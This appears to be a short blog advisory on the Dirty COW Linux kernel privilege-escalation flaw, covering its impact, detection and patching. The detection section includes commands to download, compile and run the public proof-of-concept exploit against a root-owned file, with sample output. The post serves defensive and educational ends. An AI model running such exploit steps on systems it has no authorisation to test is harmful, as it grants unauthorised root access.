Dirty COW (CVE-2016–5195): a 0-day local privilege escalation vulnerability in the Linux kernel…

Any user can become root in less than 5 seconds!


The bug has existed since Linux kernel version 2.6.22 and was found by Phil Oester.

Exploitation of this bug does not leave any trace of anything abnormal happening to the logs. 
So you can not detect if someone has exploited this against your server.

From official page:

A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.

Impact

  • An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

How to determine if your system is vulnerable

For RHEL/CentOS Linux, use the following script:

$ wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh
$ bash rh-cve-2016-5195_1.sh

For all other distro you can try the POC, that rewrites a file owned by root:

$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

Run it first as root:

$ sudo -s
# echo this is not a test > foo

Then run this as normal user:

$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000

How to fix?

Simply update your linux distribution! 🙂

RedHat/Centos/Fedora

$ sudo yum update
$ sudo reboot

Debian/Mint/Ubuntu

sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
sudo reboot

Links and references

http://dirtycow.ninja/
http://dirtycow.ninja/
http://dirtycow.ninja/
http://dirtycow.ninja/

Comments